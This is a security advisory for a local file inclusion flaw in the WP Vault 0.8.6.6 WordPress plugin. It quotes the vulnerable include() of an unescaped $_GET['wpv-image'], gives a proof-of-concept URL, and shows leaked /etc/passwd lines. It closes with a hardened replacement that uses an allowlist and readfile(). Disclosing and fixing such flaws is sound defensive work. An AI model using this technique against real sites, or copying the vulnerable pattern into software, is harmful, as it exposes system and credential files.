WP Vault 0.8.6.6 – Local File Inclusion

Homepage:

https://wordpress.org/plugins/wp-vault/

Description:

User access required: any user.

$_GET["wpv-image"] is not escaped before it is used in include().

File / Code:

Path: /wp-content/plugins/wp-vault/trunk/wp-vault.php

Line: 228

include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]);


if (isset($_GET["wpv_file_id"])) {
    include(dirname(__FILE__) . "/wpv-file-handler.php");
    exit;
}
else if (isset($_POST["wpv-tooltip"])) {
    include(dirname(__FILE__) . "/ajax-response/wpv-tooltip.php");
    exit;
}
else if (isset($_GET["wpv-image"])) {
    include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]);
    exit;
}
else if (isset($_GET["wpv-css"])) {
    if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css")) {
        header("Content-type: text/css");
        include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css");
        exit;
    }
    else if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php")) {
        header("Content-type: text/css");
        include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php");
        exit;
    }
}

Proof of Concept:

http://Target/?wpv-image=[LFI]

Result:

The file contents are printed; for example, sensitive files:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

Timeline:

  • 28/11/2016 – Discovered
  • 28/11/2016 – Vendor not found
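
Mitigation sketch for the wpv-image branch, as an added example (not the plugin's own code and not a vendor patch): the parameter is reduced to a bare file name, checked against an extension allowlist, confirmed to resolve inside the images directory, and sent with readfile() instead of include(). The names wpv_resolve_image and WPV_IMAGE_TYPES and the list of allowed extensions are assumptions.

```php
<?php
// Added example: hardened replacement for the wpv-image branch.
// wpv_resolve_image() and WPV_IMAGE_TYPES are hypothetical names; the
// extension allowlist is an assumption about what the plugin serves.

const WPV_IMAGE_TYPES = [
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
];

/** Map a user-supplied name to a file inside $baseDir, or return null. */
function wpv_resolve_image(string $baseDir, $name): ?array
{
    // Reject arrays (?wpv-image[]=x), empty values and NUL bytes.
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // Accept a bare file name only: no "/" or "\" and therefore no "../".
    if ($name !== basename($name) || strpos($name, '\\') !== false) {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(WPV_IMAGE_TYPES[$ext])) {
        return null;
    }
    // realpath() resolves symlinks, so containment is checked on the real location.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return ['path' => $path, 'type' => WPV_IMAGE_TYPES[$ext]];
}

if (isset($_GET['wpv-image'])) {
    $img = wpv_resolve_image(__DIR__ . '/images', $_GET['wpv-image']);
    if ($img === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: ' . $img['type']);
    header('X-Content-Type-Options: nosniff');
    readfile($img['path']); // sends bytes only; the file is never executed as PHP
    exit;
}
```

Because readfile() only streams bytes, a file that ends up in the images directory is never interpreted as PHP, which include() would do.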
